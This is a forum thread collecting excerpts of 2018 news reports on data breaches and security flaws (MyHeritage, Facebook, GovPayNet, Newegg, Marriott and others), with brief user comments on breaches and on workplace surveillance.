Octopus Overlords

MyHeritage, an Israeli-based genealogy and DNA testing company, disclosed today that a security researcher found on the Internet a file containing the email addresses and hashed passwords of more than 92 million of its users.

MyHeritage says it has no reason to believe other user data was compromised, and it is urging all users to change their passwords. It says sensitive customer DNA data is stored on IT systems that are separate from its user database, and that user passwords were “hashed” — or churned through a mathematical model designed to turn them into unique pieces of gibberish text that is (in theory, at least) difficult to reverse.

MyHeritage did not say in its blog post which method it used to obfuscate user passwords, but suggested that it had added some uniqueness to each password (beyond the hashing) to make them all much harder to crack.
...
MyHeritage’s repeated assurances that nothing related to user DNA ancestry tests and genealogy data was impacted by this incident is are not reassuring. Much depends on the strength of the hashing routine used to obfuscate user passwords.

Thieves can use open-source tools to crack large numbers of passwords that are scrambled by weaker hashing algorithms (MD5 and SHA-1, e.g.) with very little effort. Passwords jumbled by more advanced hashing methods — such as Bcrypt — are typically far more difficult to crack, but I would expect any breach victim who was using Bcrypt to disclose this and point to it as a mitigating factor in a cybersecurity incident.

Facebook disclosed Thursday that a software bug may have switched some users’ posts to “public” without telling them. That means that status updates, photos, and other Facebook activity that people thought they were sharing just with their friends, or with friends of friends, would have instead been viewable by anyone—unless they noticed the settings change and fixed it.

The bug affected 14 million users around the world, Facebook told Recode and other news outlets. It was active for 10 days, from May 18 to May 27, before being fixed. Facebook said Thursday it has begun notifying those affected and prompting them to review their posts and privacy settings from that time period.

In a support announcement, D-Link officials said that two separate code-signing certificates were recently misappropriated by a “highly active cyber espionage group.” The post said most D-Link customers won’t be affected by the theft, but it also suggested some people may experience errors when viewing mydlink IP cameras within Web browsers. Company engineers are in the process of releasing updated firmware to fix the errors. People using mydlink mobile applications aren’t affected.

Both D-Link and Changing Information Technology have revoked the stolen certificates. Until the D-Link firmware is issued, the company’s support announcement is advising people who want to use browsers to view their affected D-Link cameras to temporarily ignore the certificate revocation warnings. This is bad advice that could be abused by malware operators. Users should disregard it.

Researchers have found another serious security flaw in computer chips designed by Intel.

Nicknamed Foreshadow, this is the third significant flaw to affect the company’s chips this year.

The US government’s body for computer security said “an attacker could exploit this vulnerability to obtain sensitive information”.

Intel has released a patch which mitigates the problem, which affects processors released from 2015 onwards.

Government Payment Service Inc. — a company used by thousands of U.S. state and local governments to accept online payments for everything from traffic citations and licensing fees to bail payments and court-ordered fines — has leaked more than 14 million customer records dating back at least six years, including names, addresses, phone numbers and the last four digits of the payer’s credit card.

Indianapolis-based GovPayNet, doing business online as GovPayNow.com, serves approximately 2,300 government agencies in 35 states. GovPayNow.com displays an online receipt when citizens use it to settle state and local government fees and fines via the site. Until this past weekend it was possible to view millions of customer records simply by altering digits in the Web address displayed by each receipt.

Carpet_pissr wrote: ↑Thu Sep 20, 2018 12:22 am Newegg

Hackers stole customer credit cards in Newegg data breach

"Newegg is clearing up its website after a month-long data breach.

Hackers injected 15 lines of card skimming code on the online retailer’s payments page which remained for more than a month between August 14 and September 18, Yonathan Klijnsma, a threat researcher at RiskIQ, told TechCrunch. The code siphoned off credit card data from unsuspecting customers to a server controlled by the hackers with a similar domain name — likely to avoid detection. The server even used an HTTPS certificate to blend in.

The code also worked for both desktop and mobile customers — though it’s unclear if mobile customers are affected."

It is now free in every U.S. state to freeze and unfreeze your credit file and that of your dependents, a process that blocks identity thieves and others from looking at private details in your consumer credit history. If you’ve been holding out because you’re not particularly worried about ID theft, here’s another reason to reconsider: The credit bureaus profit from selling copies of your file to others, so freezing your file also lets you deny these dinosaurs a valuable revenue stream.

Enacted in May 2018, the Economic Growth, Regulatory Relief and Consumer Protection Act rolls back some of the restrictions placed on banks in the wake of the Great Recession of the last decade. But it also includes a silver lining. Previously, states allowed the bureaus to charge a confusing range of fees for placing, temporarily thawing or lifting a credit freeze. Today, those fees no longer exist.
...
Spouses may request freezes for each other by phone as long as they pass authentication.

The new law also makes it free to place, thaw and lift freezes for dependents under the age of 16, or for incapacitated adult family members. However, this process is not currently available online or by phone, as it requires parents/guardians to submit written documentation (“sufficient proof of authority”), such as a copy of a birth certificate and copy of a Social Security card issued by the Social Security Administration, or — in the case of an incapacitated family member — proof of power of attorney.

The RCMP and Office of the Information and Privacy Commissioner of British Columbia are investigating allegations of a possible data breach involving the bankrupt computer retailer NCIX.

Authorities are investigating a claim that NCIX's database servers have been advertised for sale online with all of the information still intact.

In doing so, it may have compromised the security of countless customers.

According to a statement from Richmond RCMP, the case was opened Thursday and police have seized the servers.

The author Travis Doering is a systems analyst who says he noticed a Craigslist ad listing NCIX computers for sale.

Doering says he arranged to meet the seller, a man who called himself Jeff, in a warehouse in Richmond. He says he was stunned when the man offered the information from offline backup servers on millions of transactions.

"Every record for more than 10 years was there."

He says he saw personal data of customers, including addresses, phone numbers.and financial information.

"Credit card information was there in plain text with numbers, CVVs [Card Verification Value] and expiry dates," Doering said.

He also saw personal income tax information about employees such as T4 statements. He showed some of the statements to CBC News.

Carpet_pissr wrote: ↑Thu Sep 27, 2018 7:57 am Yeah, FB is pretty much a data breach itself as far as I’m concerned.

On the afternoon of Tuesday, September 25, our engineering team discovered a security issue affecting almost 50 million accounts. We’re taking this incredibly seriously and wanted to let everyone know what’s happened and the immediate action we’ve taken to protect people’s security.

Our investigation is still in its early stages. But it’s clear that attackers exploited a vulnerability in Facebook’s code that impacted “View As” a feature that lets people see what their own profile looks like to someone else. This allowed them to steal Facebook access tokens which they could then use to take over people’s accounts. Access tokens are the equivalent of digital keys that keep people logged in to Facebook so they don’t need to re-enter their password every time they use the app.

On August 22, 2018, the Federal Bureau of Investigation (FBI) notified Burgerville of a cybersecurity breach impacting a number of the company’s systems. The breach was perpetrated by Fin7 and was a sophisticated attack targeting companies with locations in the Pacific Northwest. Burgerville agreed to cooperate fully with the FBI investigation, and immediately began a forensic investigation of its own to determine the full extent of the breach.

On September 19, 2018, as part of its forensics investigation, Burgerville discovered that the breach, which was initially thought to be a brief intrusion, was still active. The group of hackers had placed malware on Burgerville’s network and were continuing to collect payment data. Burgerville immediately began taking steps to contain the breach and disable the malware with the help of a third-party team of cybersecurity experts and in cooperation with the FBI.

Isgrimnur wrote: ↑Wed Oct 03, 2018 2:40 pm

Exodor wrote: ↑Wed Oct 03, 2018 2:41 pm

Isgrimnur wrote: ↑Wed Oct 03, 2018 2:40 pm

Really?

hitbyambulance wrote: ↑Thu Oct 04, 2018 4:38 pm Burgerville had some decent vegetarian burgers, actually. i'd go back there.

Blackhawk wrote: ↑Mon Oct 08, 2018 6:02 pm Oh, and they're shutting down Google+ in response.

Jason Edward Harrington spent six years working the luggage-screening checkpoint at O’Hare International Airport in Chicago. A college graduate and freelance writer, he initially took the job as a stopgap, but found that he enjoyed meeting passengers from all over the world, some of whom showed a real interest in him. But while working for the TSA, Harrington noticed that his bosses were following and video-recording his every move, a practice they said was at least in part for his protection: If, perchance, a traveler’s iPad went missing, the videotapes would prove that Harrington was not to blame. Harrington was on board with that. His problem, he told me, was that supervisors would also view the tapes to search for the slightest infraction—anything from gum chewing to unauthorized trips to the bathroom. Eventually, these intrusions led him to quit. “If they trusted us, respected us, you could really enjoy the job,” Harrington told me. “But they didn’t.”

A TSA spokesman, Michael McCarthy, acknowledged the agency’s use of surveillance, though he attributed the “fairly rapid” turnover rate of TSA baggage screeners to other factors—in particular, to “low pay and high stress.” In fact, electronic surveillance of employees, through technologies including not just video cameras but also monitoring software, has grown rapidly across all industries. Randolph Lewis, a professor of American studies at the University of Texas at Austin and the author of Under Surveillance: Being Watched in Modern America, pointed to software that makes it possible for employers to monitor employee facial expressions and tone of voice to gauge their emotional states, such as rage or frustration. Among more conventional surveillance methods, employers can track employees’ website visits and keep tabs on their employees’ keystrokes. Employers can also monitor employees’ personal blogs and read their social-networking profiles. In one case in California, a sales executive at a money-transfer firm sued her employer, claiming she had been fired for disabling an app that used employer-issued cell phones to track workers via GPS, even when they were off the clock. (The suit was later settled out of court.)

Lorini wrote: ↑Wed Oct 17, 2018 11:09 am Sometimes I wish I were still working, but it's crap like that that reminds me of why I'm not.

Blackhawk wrote: ↑Wed Oct 17, 2018 9:57 am That doesn't surprise me much. That's what working in casinos was like clear back in the 90s. They told me on day one that unless I was in the bathroom I should assume that one of several thousand video cameras was looking over my shoulder.

gilraen wrote: ↑Wed Oct 17, 2018 11:36 am and if I were told that my employer was going to measure my keystrokes or otherwise monitor what I'm doing all day long, I'd quit. I will not put up with that kind of disrespect, if you don't trust me to do my work, then I'll go somewhere else.

stimpy wrote: ↑Wed Oct 17, 2018 11:14 am

Lorini wrote: ↑Wed Oct 17, 2018 11:09 am Sometimes I wish I were still working, but it's crap like that that reminds me of why I'm not.

Does, Not. Compute.

gilraen wrote: ↑Wed Oct 17, 2018 11:36 am

Blackhawk wrote: ↑Wed Oct 17, 2018 9:57 am That doesn't surprise me much. That's what working in casinos was like clear back in the 90s. They told me on day one that unless I was in the bathroom I should assume that one of several thousand video cameras was looking over my shoulder.

Casinos are a special case

Researchers have classified PortSmash as a side-channel attack. In computer security terms, a side-channel attack describes a technique used for leaking encrypted data from a computer's memory or CPU, which works by recording and analyzing discrepancies in operation times, power consumption, electromagnetic leaks, or even sound to gain additional info that may help break encryption algorithms and recovering the CPU's processed data.

Researchers say PortSmash impacts all CPUs that use a Simultaneous Multithreading (SMT) architecture, a technology that allows multiple computing threads to be executed simultaneously on a CPU core.

In lay terms, the attack works by running a malicious process next to legitimate ones using SMT's parallel thread running capabilities. The malicious PortSmash process than leaks small amounts of data from the legitimate process, helping an attacker reconstruct the encrypted data processed inside the legitimate process.

Carpet_pissr wrote: ↑Fri Nov 30, 2018 12:29 pm Marriott

Marriott reveals data breach of 500 million Starwood guests

Marriott says its guest reservation system has been hacked, potentially exposing the personal information of approximately 500 million guests.

The hotel chain said Friday the hack affects its Starwood reservation database, a group of hotels it bought in 2016 that includes the St. Regis, Westin, Sheraton and W Hotels.
Marriott said hackers had gained "unauthorized access" to the Starwood reservation system since 2014, but the company only identified the issue last week.
"The company recently discovered that an unauthorized party had copied and encrypted information, and took steps towards removing it," Marriott said in a statement.
For 327 million people, Marriott says the guests' exposed information includes their names, phone numbers, email addresses, passport numbers, date of birth and arrival and departure information. For millions others, their credit card numbers and card expiration dates were potentially compromised.